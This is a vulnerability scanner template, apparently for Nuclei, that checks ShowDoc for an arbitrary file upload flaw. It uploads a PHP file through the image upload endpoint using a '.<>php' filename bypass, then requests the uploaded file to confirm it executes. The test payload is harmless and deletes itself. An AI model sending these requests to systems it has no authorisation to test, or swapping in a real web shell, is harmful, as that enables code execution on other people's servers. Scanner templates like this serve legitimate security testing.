id: poc-yaml-showdoc-uploadfile

info:
  name: poc-yaml-showdoc-uploadfile
  author: White(https://github.com/WhiteHSBG)
  severity: high
  tags: xray-converted,fileupload,ct-159094
  reference:
    - https://github.com/star7th/showdoc/pull/1059

http:
  - raw:
      - |
        POST /index.php?s=/home/page/uploadImg HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=--------------------------{{rand_base(8)}}

        ----------------------------{{rand_base(8)}}
        Content-Disposition: form-data; name="editormd-image-file"; filename="{{rand_base(8)}}.<>php"
        Content-Type: text/plain
        
        <?php echo ''.({{rand_int(1000, 9999)}}-{{rand_int(1000, 9999)}}); unlink(__FILE__); ?>
        ----------------------------{{rand_base(8)}}--
        

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "success"
  - raw:
      - |
        GET /Public/Uploads/{{date}}/{{file}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200